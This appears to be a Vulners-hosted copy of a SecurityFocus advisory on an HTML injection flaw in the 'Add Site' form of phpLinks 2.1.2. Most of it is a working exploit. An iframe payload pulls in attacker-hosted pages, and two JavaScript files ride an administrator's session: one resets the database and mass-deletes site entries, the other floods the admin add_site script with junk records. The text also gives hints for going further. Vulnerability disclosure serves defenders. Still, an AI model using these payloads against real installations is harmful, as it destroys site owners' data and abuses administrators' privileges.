Vulners
Lucene search
PHPLinks 2.1.2 Add Site HTML Injection Vulnerability
source: http://www.securityfocus.com/bid/6632/info
phpLinks is prone to HTML injection.
phpLinks does not sufficiently sanitized HTML and script code supplied via form fields before displaying this data to administrative users. This issue exists in the 'add.php' script, which is used to add sites to the phpLinks system.
As a result, an attacker may cause malicious HTML and script code to be executed in the web client of an administrative user who reviews attacker-supplied data submitted when a site is added.
Put this in one of the field on "Add Site" form located at
http://blah/phplinks/index.php?show=add&PID=
If you inject the code into the Site Title or Site Url field, the code
will be ran as soon as a logged in administrator views it.
<iframe src=http://blah/death.html></iframe>
Below is the code for the called file "death.html"
---------------------------------------------------------------------------
<script language=JavaScript>
var i = 10; // This is the number of the user ID to start deleting
var BaseURL = "http://victimsite/phplinks/";
window.open(BaseURL + '/admin/reset.php?
reset_in=&reset_out=&search_terms=&referrers=&submit='); // this resets
the database
function Waste()
{
while (i) {
i++;
window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i
+ '&sure=Yes');
}
}
</script>
<body onLoad="Waste();">
---------------------------------------------------------------------------
As you can see, that code (when called by a logged in admin validating
sites) is run, the database is in alot of cases going to be left empty. By
the way, the dbtable=links can be changed to dbtable=temp in order to
affect sites not yet approved etc. On the other hand you can add users to
the database and more. Take the following code for example:
<iframe src=http://blah/life.html></iframe>
Below is the code for the called file "life.html":
---------------------------------------------------------------------------
<script language=JavaScript>
var i = 1;
var BaseURL = "http://victimsite/phplinks/";
function Gluttony()
{
while (i) {
i++;
window.open(BaseURL + '/admin/add_site.php?SiteName=JeiAr0wnethTheee' + i
+ '&SiteURL=http://www.b' + i + 'j.orfd&Description=' + i
+'3333333333333333333333333333333333&Category=&Country=Turkey.gif&Email=1@t
.' + i + '&UserName=12345' + i
+ '&Password=12345678&Hint=12345678910&add=' + i + '&sure=Yes');
}
}
</script>
<body onLoad="Gluttony();">
---------------------------------------------------------------------------
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1